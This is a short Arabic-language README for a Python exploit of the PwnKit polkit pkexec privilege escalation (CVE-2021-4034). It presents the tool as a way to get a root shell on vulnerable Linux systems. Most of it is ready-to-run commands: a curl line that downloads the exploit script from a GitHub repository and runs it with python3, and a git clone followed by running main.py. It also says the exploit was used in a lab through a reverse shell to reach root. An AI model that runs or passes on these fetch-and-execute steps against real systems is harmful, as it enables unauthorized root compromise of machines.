
استغلال Python لثغرة تصعيد الامتيازات المحلية PwnKit (CVE-2021-4034)، الذي يوفّر الوصول إلى شل الجذر عبر pkexec الخاص بـ polkit على أنظمة Linux المعرّضة للخطر.
هذا استغلال مكتوب بلغة Python للحصول على شل، وتصعيد الصلاحيات من x إلى root يعمل من خلال الثغرة CVE-2021-4034 والتي تُعرف أيضًا باسم PwnKit
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
هذه الأمثلة تم تنفيذها من خلال مختبر مع reverse shell، وبذلك قمنا بتشغيل الاستغلال وارتقينا إلى root بسهولة
هذا البرنامج هو مجرد "ترجمة" أو ما يعادله بلغة Python للبرنامج الأصلي الذي كُتب بلغة C